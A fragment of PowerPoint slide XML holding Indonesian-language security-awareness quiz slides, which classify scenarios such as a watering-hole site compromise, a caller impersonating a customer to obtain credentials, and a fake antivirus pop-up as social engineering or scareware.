              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengkompromikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengiriman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pizza </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengunjung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginfeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> e-commerce dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menembus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> e-commerce.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34870816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D" dirty="0"/>
              <a:t>Meja </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bantuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telepon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penelepon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyatakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs web e-commerce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesanannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dia juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginginkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang valid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdaftar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekayasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Social engineering attempt (Pretexting / Impersonation), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Caller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpura</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-pura </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Fakta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di database dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> company code/customer ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperkuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>impersonation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembelian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melihat-lihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di situs web vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jendela</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengklaim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> antimalware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ribu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terinfeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virus. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Petunjuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jendela</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengklik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tautan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekayasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Scareware (Fake antivirus / Rogue security software), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
